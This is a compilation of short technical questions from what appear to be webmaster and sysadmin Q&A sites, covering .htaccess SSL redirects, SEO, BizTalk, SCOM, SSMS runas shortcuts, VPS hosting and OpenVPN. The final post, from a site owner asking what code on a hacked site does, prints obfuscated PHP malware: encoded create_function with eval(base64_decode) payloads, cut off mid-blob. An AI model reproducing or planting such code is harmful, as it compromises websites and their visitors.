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  • Properly force SSL with .htaccess, no double authentication

    - by cwd
    I'm trying to force SSL with .htaccess on a shared host. This means there I only have access to .htaccess and not the vhosts config. I know you can put a rule in the VirtualHost config file to force SSL which will be picked up there (and acted upon first), preventing double authentication, but I can't get to that. Here's the progress I've made: Config 1 This works pretty well but it does force double authentication if you visit http://site.com - once for http and then once for https. Once you are logged in, it automatically redirects http://site.com/page1.html to the https coutnerpart just fine: RewriteEngine On RewriteCond %{HTTPS} !=on RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301] RewriteEngine on RewriteCond %{HTTP_HOST} !(^www\.site\.com*)$ RewriteRule (.*) https://www.site.com$1 [R=301,L] AuthName "Locked" AuthUserFile "/home/.htpasswd" AuthType Basic require valid-user Config 2 If I add this to the top of the file, it works a lot better in that it will switch to SSL before prompting for the password: SSLOptions +StrictRequire SSLRequireSSL SSLRequire %{HTTP_HOST} eq "site.com" ErrorDocument 403 https://site.com It's clever how it will use the SSLRequireSSL option and the ErrorDocument403 to redirect to the secure version of the site. My only complaint is that if you try and access http://site.com/page1.html it will redirect to https://site.com/ So it is forcing SSL without a double-login, but it is not properly forwarding non-SSL resources to their SSL counterparts. Regarding the first config, Insyte mentioned "using mod_rewrite to perform a simple redirect is a bit of overkill. Use the Redirect directive instead. It's possible this may even fix your problem, as I believe mod_rewrite rules are some of the last directives to be processed, just before the file is actually grabbed from the filesystem" I have not had no such luck on finding a force-ssl config option with the redirect directive and so have been unable to test this theory.

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  • Will adding top level directories with similar structure to existing directories change the SEO of my site?

    - by Russell Sims
    I've been pointed this way for SEO related questions and this one has had me pondering for a little while now. I'm recreating a site's structure. The website's content is generated through several feeds and unless I want to place each and every - of the 10,000 odd - venues into their own category manually, I can't avoid categorising each item by using its address. The current the structure looks like this Homepage > region > county > city/town > venue page and the URL looks like domain/region/county/city/venue/ I'm relatively happy to use this structure as it's not too convoluted. However we also promote deals and we also group the venues into their respective franchise, so that leads to URLs such as: domain/groups AND domain/deals My question is: how would the directory structure look with these new additions? Would I have a URL that looks like domain/deals/region/county/city/venue or domain/group/region/county/city/venue and just put a 301 or a canonical link tag on the page to prevent the duplicate pages competing with each other? Am I just worrying about it needlessly and perhaps link straight from domain/deals to the venue page URL domain/region/county/city/venue, this bothers me a bit though as the deals and groups will not be in the breadcrumbs.

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  • Migrating BizTalk 2006 R2 to BizTalk 2010 XLANGs Issue

    - by SURESH GIRIRAJAN
    When we migrate some BizTalk apps from BizTalk 2006 R2 to BizTalk 2010, and we ran into issue when a .net component called inside the orchestration. In the .net component we are trying to retrieve some promoted property and we also checked in the BizTalk group hub to validate it was promoted, no issues there.  Only when we try to access the data into the .net component we had issue. We just moved all the assembly what we had in BizTalk 2006 R2 to BizTalk 2010, didn’t recompile anything in BizTalk 2010 environment. But looking further there is couple of new namespace added to the Microsoft.XLANGs… in BizTalk 2010 compared to BizTalk 2006 R2 caused the issue. So all we did to fix the issue is recompile the project in 2010 environment and it worked fine. So it looks like some backward compatibility issue.  public static void Load(XLANGMessage msg) {  try  {      // get the process id from context.       object ctxVal = msg.GetPropertyValue(typeof(ProcessID)); … } BizTalk 2010: Error Message in the event viewer:  The service instance will remain suspended until administratively resumed or terminated. If resumed the instance will continue from its last persisted state and may re-throw the same unexpected exception. InstanceId: 441d73d3-2e84-49d2-b6bd-7218065b5e1d Shape name: Bulk Load ShapeId: bb959e56-9221-48be-a80f-24051196617d Exception thrown from: segment 1, progress 65 Inner exception: A property cannot be associated with the type 'Tellago.Common.Schemas.ProcessId'.   Exception type: InvalidPropertyTypeException Source: Microsoft.XLANGs.Engine Target Site: Microsoft.XLANGs.RuntimeTypes.MessagePropertyDefinition _getMessagePropertyDefinition(System.Type) The following is a stack trace that identifies the location where the exception occured   at Microsoft.XLANGs.Core.XMessage._getMessagePropertyDefinition(Type propType) at Microsoft.XLANGs.Core.XMessage.GetContentProperty(Type propType) at Microsoft.XLANGs.Core.XMessage.GetPropertyValue(Type propType) at Microsoft.BizTalk.XLANGs.BTXEngine.BTXMessage.GetPropertyValue(Type propType) at Microsoft.XLANGs.Core.MessageWrapperForUserCode.GetPropertyValue(Type propType) at Tellago.Common.Components.Load(XLANGMessage msg) at Tellago.SuspensionProcess.segment1(StopConditions stopOn) at Microsoft.XLANGs.Core.SegmentScheduler.RunASegment(Segment s, StopConditions stopCond, Exception& exp)

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  • Re-deploy only the reports on SCOM Management Packs

    - by Gabriel Guimarães
    I've migrated Reporting Services on a SCOM 2007 R2 install, and noticed that the reports have not being copied. I can create a new report, but the ones I've had because of the management packs are gone. I've tried re-applying the Management Packs however it doesn't re-deploy them and when I try to access for example: Monitoring - Microsoft Windows Print Server - Microsoft Windows Server 2000 and 2003 Print Services - State View - select any item and click Alerts on the right menu. I get the following error: Date: 12/24/2010 12:40:35 PM Application: System Center Operations Manager 2007 R2 Application Version: 6.1.7221.0 Severity: Error Message: Cannot initialize report. Microsoft.Reporting.WinForms.ReportServerException: The item '/Microsoft.SystemCenter.DataWarehouse.Report.Library/Microsoft.SystemCenter.DataWarehouse.Report.Alert' cannot be found. (rsItemNotFound) at Microsoft.Reporting.WinForms.ServerReport.GetExecutionInfo() at Microsoft.Reporting.WinForms.ServerReport.GetParameters() at Microsoft.EnterpriseManagement.Mom.Internal.UI.Reporting.Parameters.ReportParameterBlock.Initialize(ServerReport serverReport) at Microsoft.EnterpriseManagement.Mom.Internal.UI.Console.ReportForm.SetReportJob(Object sender, ConsoleJobEventArgs args) The report doesn't exist on the reporting services side. how do I re-deploy this reports? Thanks in advance.

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  • What is your most preferred method of site pagination?

    - by John Smith
    There seem to be quite a few implementations of this feature. Some sites like like Stackexchange have it laid out like this: [1][2][3][4][5] ... [954][Next] Other sites like game forums may have something like this: [1][2][3] ... [10] ... [50] ... [500] ... [954][Next] Some sites like webcomics (XKCD comes to mind) have it laid out like this: [Last][Prev][Random][Next][First] Reddit has a very simple pagination with only: [Prev][Next] Sites like Stackexchange and Google also allow you to change how many results you want per page. Personally, I have never used this feature. Is it even worth including or does it just further confuse the design with needless features? Personally, I have only ever seen the need for the webcomic style (without the random). If I need to go to a specific page (which is very, very rare) then I can just edit the address bar. Is it good design to make something more complex for rare occasions where it might make save the user some time? Is having to edit the address bar to navigate the site effectively in some circumstances bad design?

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  • Browser language detection & content ranking for new language on the same site.

    - by Arnaud
    I've been reading a lot about it but it's still really hard to make up my mind. My understand is that if your website provide a link to the other language, this should not be an issue for google as long as your links are clear and clean, google will be able to make his way through it. The website was orginaly in french and I added the english version and I'm just worry that english speaker will just leave if the site is not in the correct language, for the home page I just wanted to get the value from the browser and redirect it to /fr/ or /en/ for the first page. (using php this will be very easy) Could you guys have a look at it and tell me what you think about it http://tinyurl.com/bpc5bn9 I don't want to get it wrong and lost my ranking with google. Also the website has good rank on the french side and the english has been online for 2 weeks and only get few visit a day, is that because all the back link refer to /fr/ and google is cleaver enough to decide that they are 2 differantes website and the back link will have to point to /en/ to increase the ranking value? Or will take few more weeks for the website to grow? Thanks for your hep

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  • Not allowed to upload .HTML files to my own DNN Site: Is it normal?

    - by Jake M
    My Question: Our webhost provider wont make it so we can upload .html files to our DNN site trhough the DNN File Manager page. Is that normal, should I push them to allow me to do this? We have recently transferred our website to a Dot Net Nuke run website. We originally had our website on a Linux server with Python scripts handling the backend. Obviously we now have a Windows server running .NET with ASP .NET code on the backend. Our webhost is a local Australian company. And they are saying we cant upload any .html files to the main part of the server, ie, www.ourdomain.com/Portals/0/. They are saying that the only place I can upload .html files is via FTP to this folder *www.ourdomain.com/Portals/0/html_content* This is a major problem for me because I am trying to upload my own skin which means I need to upload a main.html file to www.ourdomain.com/Portals/0/skins/myskin/ but they wont let me?! I guess what I am asking is, is this normal practice, why would they not allow this? As an experienced web admin for Linux servers and as someone who is used to being able to do whatever I want on my OWN server this is someing that really pis$%s me off!

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  • Configuring SQL Server Management Studio to use Windows Integrated Authentication &hellip; from non-

    - by Enrique Lima
    Did you know you can pass your Windows credentials to SQL Server even when working from a workstation that is not joined to a domain? Here is how … From Start, then click All Programs, find Microsoft SQL Server (version 2005 or 2008). Once there, do a right-click on SQL Server Management Studio, then click on Properties Now, follow below to modify the entry for Target: Now the real task (we will be using the runas command) … Modify the shortcut’s target as follows, and remember to replace <domain\user> with the values that correspond to your environment : x64 SQL Server 2008 C:\Windows\System32\runas.exe /user:<domain\user> /netonly "C:\Program Files (x86)\Microsoft SQL Server\100\Tools\binn\VSShell\Common7\IDE\Ssms.exe -nosplash" SQL Server 2005 C:\Windows\System32\runas.exe /user:<domain\user> /netonly "C:\Program Files (x86)\Microsoft SQL Server\90\Tools\binn\VSShell\Common7\IDE\SqlWb.exe -nosplash" x86 SQL Server 2008 C:\Windows\System32\runas.exe /user:<domain\user> /netonly "C:\Program Files\Microsoft SQL Server\100\Tools\binn\VSShell\Common7\IDE\Ssms.exe -nosplash" SQL Server 2005 C:\Windows\System32\runas.exe /user:<domain\user> /netonly "C:\Program Files\Microsoft SQL Server\90\Tools\binn\VSShell\Common7\IDE\SqlWb.exe -nosplash" Since we modified the shortcut, we will need to fix the icon for SSMS.  We will fix it by pressing the Change Icon… button and pointing to the original “icon” providers. It is the executables for SSMS that hold the icon information, so we need to point to … x64 SQL Server 2008 %ProgramFiles% (x86)\Microsoft SQL Server\100\Tools\Binn\VSShell\Common7\IDE\Ssms.exe SQL Server 2005 C:\Program Files (x86)\Microsoft SQL Server\90\Tools\binn\VSShell\Common7\IDE\SqlWb.exe x86 SQL Server 2008 %ProgramFiles%\Microsoft SQL Server\100\Tools\Binn\VSShell\Common7\IDE\Ssms.exe SQL Server 2005 C:\Program Files\Microsoft SQL Server\90\Tools\binn\VSShell\Common7\IDE\SqlWb.exe When you start SSMS from a modified shortcut, you’ll be prompted for your domain password: SSMS will show up stating a different account in the username box, but the parameters from the configuration you are doing above do work and will pass on correctly.

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  • Are Intel compilers really better than the Microsoft ones?

    - by Rocket Surgeon
    Years ago, I was surprised when I discovered that Intel sells Visual Studio compatible compilers. I tried it in particular for C/C++ as well as fantastic diagnostic tools. But the code was simply not that computationally intensive to notice the difference. The only impression was: did Intel really do it for me just now, wow, amazing tools with nanoseconds resolution, unbelievable. But the trial ended and the team never seriously considered a purchase. From your experience, if license cost does not matter, which vendor is the winner? It is not a broad or vague question or attemt to spark a holy war. This sort of question is about two very visible tools. Nobody likes when tools have any mysteries or surprises. And choices between best and best are always the pain. I also understand the grass is always greener argument. I want to hear all "what ifs" stories. What if Intel just locally optimizes it for the chip stepping of the month, and not every hardware target will actually work as well as Microsoft compiled? What if AMD hardware is the target and everything will slow down for no reason? Or on the other hand, what if Intel's hardware has so many unnoticable opportunities, that Microsoft compiler writers are too slow to adopt and never implement it in the compiler? What if both are the same exactly, actually a single codebase just wrapped into two different boxes and licensed to both vendors by some third-party shop? And so on. But someone knows some answers.

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  • Microsoft Silverlight 4 Data and Services Cookbook &ndash; Book Review (sort of)

    - by Jim Duffy
    I just received my copy of the Microsoft Silverlight 4 Data and Services Cookbook, co-authored by fellow Microsoft Regional Director, Gill Cleeren, and at first glance I like what I see. I’ve always been a fan of the “cookbook” approach to technical books because they are problem/solution oriented. Often developers need solutions to solve specific questions like “how do I send email from within my .NET application” and so on, and yes, that was a blatant plug to my article explaining how to accomplish just that, but I digress. :-) I also enjoy the cookbook approach because you can just start flipping pages and randomly stop somewhere and see what nugget of information is staring up at you from the page. Anyway, what I like about this book is that it focuses on a specific area of Silverlight development, accessing data and services.  The book is broken down into the following chapters: Chapter 1: Learning the Nuts and Bolts of Silverlight 4 Chapter 2: An Introduction to Data Binding Chapter 3: Advanced Data Binding Chapter 4: The Data Grid Chapter 5: The DataForm Chapter 6: Talking to Services Chapter 7: Talking to WCF and ASMX Services Chapter 8: Talking to REST and WCF Data Services Chapter 9: Talking to WCF RIA Services Chapter 10: Converting Your Existing Applications to Use Silverlight As you can see this book is all about working with Silverlight 4 and data. I’m looking forward to taking a closer look at it. Have a day. :-|

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  • How can I find out what site a popup ad came from?

    - by ændrük
    This is the situation: I've been browsing the web for an hour in pursuit of some bit of technical information and have visited several dozen websites that I don't even remember anymore. I've finally found what I need so I start closing the web browser, only to discover that — aaargh! — there's a popup ad hiding underneath! My blood boils. What insidious website is responsible for this circumvention of my browser's popup blocker? I want to make it pay for its crime. I'll write angry emails. Leave bad reviews. Even block it from my Google search results — yes, that'll show it! But I've reached an impediment. The offending site has already been closed. Is it too late to deduce the advertisement's origin? Or can I somehow un-pop the popup? Here's a test page. With only the popup left on your screen, can you deduce that it was caused by visiting PasteHTML?

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  • What is the best way to deal with 404s that are all trying to point to the same page that are from an external site?

    - by Lee
    I started getting 404s showing up in my Google Webmaster's Tools from a site linking to a specific category but with odd characters at the end of the url. So Something like this: http://example.com/category/puppies%EF%BC%9A.textwidget%E8%A6%81%E7%B4%A0%E7%B7%A8%E9%9B%86 Google Webmaster says that there are about 120 of these links and I can imagine there will be more to come. What is the best way to handle these links from an seo point-of-view? I have heard 301 redirecting too many links at one time can cause Google to ding the site but I don't want this site to continue posting broken links. Any help on this would be appreciated.

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  • Is Wordpress more appropriate than Magento/Opencart for site like this?

    - by Alex
    The premise of the site is that a user pays a small fee to advertise an item that they want to sell. Therefore the user is responsible for adding the "products", not the administrator. The product upload will create a product page for that item. This is a rather common framework that I'm sure you're familiar with. My initial thought was that it would be best suited using Magento - mainly because it needs to accept payments - and the products will grow to form a catalog of categorized products. However - there is no concept of a shopping cart. A buyer does not buy the item online, or go to a checkout. They simply look at the product, and contact the seller if they like it. The buyer and seller then take it from there. For this reason, I then begin to suspect that Magento is perhaps too overkill, or just simply not the right CMS if there is on checkout procedure (other than the uploader making a payment) So then I begin to think Wordpress....Hmmm Feature requirements: User's can add content via a form process User's can be directed to a payment gateway For each product listing - a series of photographs shall be displayed, in thumbnail form Zoom capabilities/rotate on the images would be a welcome feature In short - e-commerce CMS, or something more simple?

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  • OAuth2 vs Public API

    - by Adam Tannon
    My understanding of OAuth (2.0) is that its a software stack and protocol to allow 2+ web apps to share information about a single end user. User A is a member of Site B and Site C; Site B wants to fetch some data from Site C about User A, and this is where OAuth steps in. So first off, if this assessment is incorrect, please begin by clarifying this for me and correcting me! Assuming I'm on the right track, then I guess I'm not seeing the need for OAuth to begin with (!). I'm sure I'm just not seeing the "forest through the trees" here, but the way I see it, couldn't Site C just expose a public API that Site B could use to fetch the same data (sans OAuth)? If Site C required user credentials to access the data, could this public API just use HTTPS for secure transport and require username/password as a part of each API call? Again, I'm sure I'm missing something, but I'm just not understanding why I would need OAuth when a secure, public API written and exposed by Site C seems more than capable of delivering what Site B needs regarding User A. In general, I'm looking for a set of guidelines to go by when deciding to choose between using OAuth for my web apps or just writing my own web service ( exposing public API). Thanks in advance!

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  • Creating foreign words' learning site with memory technique (Web 2.0)? Will it work?

    - by Michal P.
    I would like to earn a little money for realizing a good, simple project. My idea is to build a website for learning of chosen by me language (for users knowing English) using mnemonics. Users would be encourage to enter English words with translation to another language and describing the way, how to remember a foreign language word (an association link). Example: if I choose learning Spanish for people who knows English well, it would look like that: every user would be encourage to enter a way to remember a chosen by him/her Spanish word. So he/she would enter to the dictionary (my site database) ,e.g., English word: beach - playa (Spanish word). Then he/she would describe the method to remember Spanish word, e.g., "Image that U r on the beach and U play volleyball" - we have the word play and recall playa (mnemonics). I would like to give possibility of pic hotlinks, encourage for fun or little shocking memory links which is -- in the art of memory -- good. I would choose a language to take a niche of Google Search. The big question is if I don't lose my time on it?? (Maybe I need to find prototype way to check that idea?)

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  • Is it possible to mod_rewrite BASED on the existence of a file/directory and uniqueID? [closed]

    - by JM4
    My site currently forces all non www. pages to use www. Ultimately, I am able to handle all unique subdomains and parse correctly but I am trying to achieve the following: (ideally with mod_rewrite): when a consumer visits www.site.com/john4, the server processes that request as: www.site.com?Agent=john4 Our requirements are: The URL should continue to show www.site.com/john4 even though it was redirected to www.site.com?index.php?Agent=john4 If a file (of any extension OR a directory) exists with the name, the entire process stops an it tries to pull that file instead: for example: www.site.com/file would pull up (www.site.com/file.php if file.php existed on the server. www.site.com/pages would go to www.site.com/pages/index.php if the pages directory exists). Thank you ahead of time. I am completely at a crapshot right now.

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  • Whats a good host for an active vBulletin site?

    - by Kyle
    I've been switching hosts using a VPS each time and I'm just really not sure I'm finding the right VPS's. I've used a VPS from burst.net & rubyringtech and I just feel like it's slowly killing my site because of the slow speed. I really don't know if it's the network or the VPS itself but I really wish to fix this. When I TOP into the VPS peak times it shows this: top - 03:18:56 up 16:33, 1 user, load average: 1.33, 1.40, 1.33 Tasks: 30 total, 1 running, 29 sleeping, 0 stopped, 0 zombie Cpu(s): 27.2%us, 13.6%sy, 0.0%ni, 59.2%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Mem: 1048576k total, 679712k used, 368864k free, 0k buffers Swap: 0k total, 0k used, 0k free, 0k cached And pages take atleast a good 2-3 minutes to load. I have only like 50-60 members on the forum also. I had a shared hosting account and the forum was lightning fast.... Is a VPS a bad idea? :\ What should I do to fix this? I'm running lighttpd with xcache, and the latest mysql + php version. The server is a intel i7 2600 w/ 1gb uplink (I think the 1gb uplink is a lie because I've tested the network and the highest download speed I've seen was 20mb/s from a code.google page) All in all I've seen people talking about linode. Should I try them? I honestly don't need a dedicated server yet it's only 50-70 members online. What should I do? I really want a VPS because I enjoy root access. Does anyone have any suggestions?

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  • OpenVPN: Single certificate authority, multiple VPNs

    - by darwish
    The company in which I work has a single site (I'll refer it as "Site A"). There are several private networks within site A. We have a running instance of OpenVPN which allows some employees to connect to one of the private networks in site A. We're planning to extend our facilities to another site (which I'll refer as "Site B") and we wish to connect both sites using OpenVPN. The VPN which will connect sites A to B will be a trunk link, meaning it will have access to all networks. If we use the same certificate authority for both VPN servers, this will allow the employees, which can only to one of the private networks within site A, to connect to the site-to-site link, which will give them access to all networks. Off course this is undesirable. Using 2 different certificate authorities seems like the obvious solution, but it doesn't feel right. I wounder if there's a way to maintain permission control within a single certificate authority.

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  • What service or software should I use to serve advertising on a site with about 120k monthly page views?

    - by JasonBirch
    I have a site that is generating about 120k monthly page views and is being hosted on a shared FreeBSD server where I have access to PHP and MySQL. I am using some custom PHP server-side scripts that give each of my ad networks (AdSense, Tribal Fusion, etc) an adjustable percentage of impressions in each of the ad positions on my pages. I am looking for a better way of managing and measuring the delivery of these ads, and would also like to be able to take direct placements and provide statistics to the clients. I am looking at options including OpenX self-hosted, OpenX community, and Google DoubleClick for Publishers Small Business (DFP), but am having difficulty determining which one will best meet my needs. They all seem to have pretty steep learning curves compared to my simple scripts. What I have taken away so far as the benefit of self-hosting is that I don't have to pay for the service if I exceed a maximum number of ad impressions, while both OpenX Community and DFP have free impression limits. Of course, if I was doing those kind of numbers I'd need to upgrade my hosting account, but I'm not sure even at that point whether it would be cheaper to serve the ads myself than pay for a premium service. Apart from this, I really need insights into what features differentiate these services, why I might want to choose one over another, and if there are any other competing products or service of the same quality that I should look into. Answers from webmasters who have used both (or all three) services and can talk to usability and ease of ad management would be highly appreciated.

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  • Could Wordpress be used/extended as a medium-size ecommerce site? [migrated]

    - by Aphelion
    Is wordpress reliable enough and could it be used with a proper plugin as a medium sized ecommerce site? We are talking around 1500 products here, estimates say around 5 to 10 costumers per day, usually returning ones. Some days none. I have a client who wants to sell online. We are situated in a country where people dont see web as something serious enough. Still, they literally have a budget of pretty much none. And 1500 products to sell online. Magento, or any other open source ecommerce platform are out of the question, there is just no resources for starting something like that. Or any time. Only way is something free, small, absolutely not resource hungry as Wordpress. I have to fight with making it work with only what i have at disposal. Also, if you can recommend any wordpress plugin for the job(WP-ecommerce?), i will be very thankful. I guess something paid, up to maximum 50$ would work too.

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  • Site hack... but what is this?

    - by menardmam
    My site have been hacked (i think) here is the code... the question, how to find what it does... <?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework("", "\x7d\73\x40\145\x76\141\x6c\50\x40\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x4a\107\x56\62YTFmWTJiYWsxY3owaXIgPSAiXHg2NlwxNjVceDZlXDE0M1x4NzRcMTUxXHg2ZlwxNTZceDVmXDE0NVx4NzhcMTUxXHg3M1wxNjRceDczIjsgJGV2YTFmWTJiYWwxY3owaXIgPSAiXHg2ZlwxNDJceDVmXDE2M1x4NzRcMTQxXHg3MlwxNjQiOyAkZXZhMWZZMmJhbDFjejhpciA9ICJceDYzXDE1N1x4NjRcMTQ1XHg3OFw2Mlx4MzIiOyBpZigkZXZhMWZZMmJhazFjejBpcigkZXZhMWZZMmJhbDFjejBpcikgJiYgIWlzc2V0KCRHTE9CQUxTWyRldmExZlkyYmFsMWN6OGlyXSkpIHsNCgkkR0xPQkFMU1skZXZhMWZZMmJhbDFjejhpcl09MTsgCWlmKCEkZXZhMWZZMmJhazFjejBpcigiXHg2NVwxNjZceDYxXDYxXHg2NlwxMzFceDMyXDE0Mlx4NjFcMTUzXHgzMVwxNDNceDU2XDYyXHg2OVwxNjIiKSkgeyBpZighJGV2YTFmWTJiYWsxY3owaXIoIlx4NjVcMTY2XHg2MVw2MVx4NjZcMTMxXHgzMlwxNDJceDYxXDE1M1x4MzFcMTQzXHg1Nlw2MFx4NjlcMTYyIikpIHsNCiBmdW5jdGlvbiBldmExZlkyYmFrMWNWMGlyKCkgew0KIC8vZWNobyBzdGFydA0KDQogaWYoIWlzc2V0KCRHTE9CQUxTWyJhZ2hleDAiXSkpIHsNCgkkR0xPQkFMU1siYWdoZXgwIl09MTsNCiAkZXZhbHNzc2dxdWxWQlRrWkxBY2ggPSAiIjsNCiBpZiAoIWlzc2V0KCRldmExZllsYmFrQmNWU2lyKSkgeyRldmExZllsYmFrQmNWU2lyID0gIjdreUo3a1NLaW9EVFdWV2VSQjNUaWNpTDFVamNtUmlMbjRTS2lBRVRzOTBjdVpsVHo1bVJPdEhXSGRXZlJ0MFp1cG1WUk5UVTJZMk1WWmtUOGgxUm4xWFVMZG1icXhHVTdoMVJuMVhVTGRtYnFaVlV6RWxObU5UVkd4RWVOdDFaemtGY21KeUp1VVROeVpHSnVjaUx4azJjd1JDTGlJQ0t1VkhkbEpISm40U055a21ja1JpTG5zVEtuNGlJbklpTG5Ba2RYNVVjMmRsVHNoRWNNaEhUOHhGZU14MlQ0eGpXa05UVXdWR05kVnpXdlYxV2M5V1Qyd2xicVpWWDNsRWNsaFRUS2RXZjhvRVp6a1ZOZHAyTndaR05WdFZYOGRtUlBGM04xVTJjVlpEWDRsVmNkbFdXS2QyYVpCblp0VkZmTkozTjFVMmNWWkRYNGxWY2RsV1dLZDJhWkJuWnRWa1ZUcEdUWEIxSnVJVE55WkdKdUl5Smk0U04xSW5aazR5SnVreUp1SXlKaTR5SjY0R2ZOcGpiV0JWZElkMFQ3TmpWUUpIVndWMmFOWnpXelFqU01oWFRiZDJNWkJuWnhwSGZORm5hc1ZXZXZwMFp0aGpXbkJIUFoxMU1KcFZYOEZsU014RFJXQjFKdUlUTnlaR0p1SXlKaTRTTjFJblprNHlKdWt5SnVJeUppNHlKQVozVk9GbmRYNUVlTnQxWnprRmNtNW1hV0ZsYjBvRVQ0MTBXbk5UV3daV2M2eFhUNDEwV25OVFd3Wm1ibVprVDR4aldrTlRVd1ZHTmRWeld2VjFXYzlXVDJ3bGF6Y0VUbjRpTTFJblprNHlKbjRpSW5JaUwxVWpjbVJpTG40U0tpQWtkWDVVYzJkbFQ5cG5SUVozTndaR05WdFZYOFZsUk94WFYyWUdiWlpqWjR4a1ZQeFdXMWNHYkV4V1o4bDFTbjlXVDIwa2RteFdaOGwxU245V1RMMVVjcXhXWjU5bVNuMUdPYWRHYzhrVlh6a2tXZHhYVUt4RVBFeEdVbjRpTTFJblprNHlKaWNpTDFVamNtUmlMbjBUTXBOSGNrc1RLaWNpTHlVVGF5WkdKdWNTTjN3Vk0xZ0hYMlFUTWNkek00eDFNMUVEWHpVRGVjTlRNeHdWTjNnSFh5RVRNY2hUTjR4Rk4wRURYd01EZWNaak14d0ZaMmdIWHpRVE1jSm1ONHgxTjJFRFg1WURlY0ZUTXh3Vk8yZ0hYM1FUTWNOVE40eGxNekVEWGlaRGVjRnpOY2RETjR4bE0wRURYM2NEZWNGak5jZFRONHhWTTBFRFhtWkRlY1ZqTXh3MU4wZ0hYeU1UTWNaek40eGxOeEVEWDNVRGVjSnpNeHdsWTJnSFh4Y0RYMlFEZWNaVE14d2xNemdIWDFJVE1jSnpNNHgxTTBFRFg0WURlY0pUTXh3MU4wZ0hYeEVUTWNWek40eGxNeEVEWDRVRGVjUkROeHdGTXpnSFgySVRNY1JtTjR4MU0wRURYM01EZWNOVE54d1ZPMmdIWHlRVE1jWnpONHhsTXlFRFg0VURlY0ZETnh3VlkyZ0hYMVlEWDNVRGVjUkROeHdGWjJnSFh5SVRNY05ETjR4Vk14RURYemNEZWNSak5jUm1ONHgxTTBFRFh4TURlY0pqTXh3Rk8xZ0hYeU1UTWNsek40eGxNeUVEWHpRRGVjTlRNeHdsTTNnSFh3Y1RNY2RUTjR4Vk16RURYek1EZWNGek5jWlRONHhWTjBFRFg0WURlY0pUTXh3VloyZ0hYelFUTWNoak40eEZOMkVEWDBVRGVjTlRNeHdWTjNnSFh5RVRNY2hUTjR4Rk4wRURYd01EZWNaak14d0ZaMmdIWHpRVE1jSm1ONHgxTjBFRFh6UURlY1JETnh3Rk0zZ0hYd2NUTWNkRE40eDFNMEVEWGhkRGVjRnpOY05tTjR4MU0wRURYd01EZWNaVE14d0ZPMGdIWHhFVE1jbHpNNHhWTXdFRFg1WURlY0pETnh3Vk8zZ0hYMklUTWNkaUwxSVRheVpHSnVjeU56Z0hYelVUTWNsak40eFZNeEVEWDNNRGVjTlROeHdWTzNnSFgxRVRNY1J6TjR4MU0xRURYNVlEZWNKRE54d2xOM2dIWDBVVE1jZERONHhGTjBFRFhoWkRlY1ZqTmNkVE40eEZOMEVEWGtaRGVjSlRNeHdWTzJnSFgwRVRNY2xqTjR4Vk15RURYelFEZWNOVE14d2xZMmdIWHlFVE1jTnpNNHhsTTBFRFhtWkRlY0ZUTXh3Rk8wZ0hYeFFUTWNGbU40eGxNd0VEWHpVRGVjQmpNeHcxTjJnSFgwWURYeU1EZWNKRE54d0ZNM2dIWHlJVE1jTnpNNHhWTXpFRFgxY0RlY1pqTXh3VloyZ0hYeU1UTWNsak40eEZOMndWTzJnSFh4RVRNY0ptTjR4Vk14RURYelFEZWNSVE14d1ZPMmdIWDBZRFh5TURlY0pETnh3Rk0zZ0hYeUlUTWNOek00eFZNekVEWDFjRGVjWmpNeHdWWjJnSFh5TVRNY2xqTjR4Rk4yd1ZPMmdIWHhFVE1jSm1ONHhWTXpFRFg1WURlY0ZUTXh3bFoyZ0hYMFlEWHlNRGVjSkROeHdGTTNnSFh5SVRNY056TTR4Vk16RURYMWNEZWNaak14d1ZaMmdIWHlNVE1jWmpONHhsTnlFRFgzUURlY1JETnh3Rk8yZ0hYMklUTWNSbU40eDFNMEVEWGhaRGVjSkRNeHcxTTFnSFh3SVRNY2RqTjR4Rk4yd2xNemdIWHlRVE1jQnpNNHhGTjFFRFh5TURlY0Z6TXh3Vk4zZ0hYMklUTWNWbU40eGxNekVEWGlaRGVjTmpOeHdGTzBnSFh4RVRNY0J6TjR4Rk4yd0ZaMmdIWHpRVE1jRnpNNHhsTXlFRFg0VURlY0p6TXh3Vk8zZ0hYeUlUTWNORE40eDFNeEVEWDFjRGVjWmpNeHdWWjJnSFh6UVRNY0J6TTR4bE55RURYa1pEZWNORE54dzFOMmdIWDBZRFh5TURlY0pETnh3Rk0zZ0hYeUlUTWNOek00eFZNekVEWDFjRGVjWmpNeHdWWjJnSFh5TVRNY0ppTG40U055SW5aazR5SnpZVE1jRjJONHhsTXhFRFgxY0RlY1pqTXh3VloyZ0hYelFUTWNCek00eGxOeUVEWGtaRGVjTkROeHdWWjJnSFh3WURYaFpEZWNKRE54d1ZNemdIWHlFVE1jZGlMMUlUYXlaR0p1Y2lJdWNpTDFJamNtUmlMblV6TmNkek40eDFOeEVEWGxaRGVjUmpOY0p6TTR4bE0wRURYd2NEZWNKak14dzFNemdIWHhNVE1jVnpONHhsTnlFRFhsWkRlY0p6TXh3bE4yZ0hYMklUTWNkRE40eEZOMEVEWDRZRGVjWmpNeHdGWjJnSFh6UVRNY0ZtTjR4Rk4wRURYelVEZWNCak14d1ZOM2dIWDJJVE1jZGlMMUlUYXlaR0p1Y2lJdWNpTDFJamNtUmlMbk1qTnh3VlkzZ0hYeUVUTWNObU40eGxOeEVEWDNVRGVjRnpNeHcxTTNnSFh5QVRNY2hUTjR4bE16RURYNWNEZWNGek5jRnpNNHhsTXpFRFhqWkRlY0pUTXh3Rk8wZ0hYelFUTWNWbU40eEZNMndWWTJnSFh5UVRNY2x6TjR4bE53RURYM1FEZWNSRE54dzFZMmdIWHlFVE1jaERONHhsTXhFRFhpNGlNMVFYYW1SQ0x5VWpacFpHSnNVak1tbG1aa2dTWmpGR2J3Vm1jZmRXWnlCM09pSWpNNHhGTTF3Vk4yZ0hYMFFUTWNabU40eDFNMEVEWDFZRGVjUkROeHdsWjFnSFgwWURYMk1EZWNWRE54dzFNM2dIWHhRVE1jSmpONHhGTTF3MVkyZ0hYeFFUTWNaek40eFZOMEVEWHdRRGVjSkNJOUFpTTFRWGFtUnlPaUkyTTR4Vk0xd2xNeWdIWHhZRFhqVkRlY0pETmNoak00eEZOMUVEWHhZRGVjWmpOeHdWTjJnSFhpQVNQZ0lUTm1sbVprc2pJMVFUTWNsak40eEZNd0VEWDVJRGVjTlROY1ZtTTR4Rk0xd0ZNMGdIWGlBU1BnVWpNbWxtWmtjQ0tzRm1kbHRqSXdJRG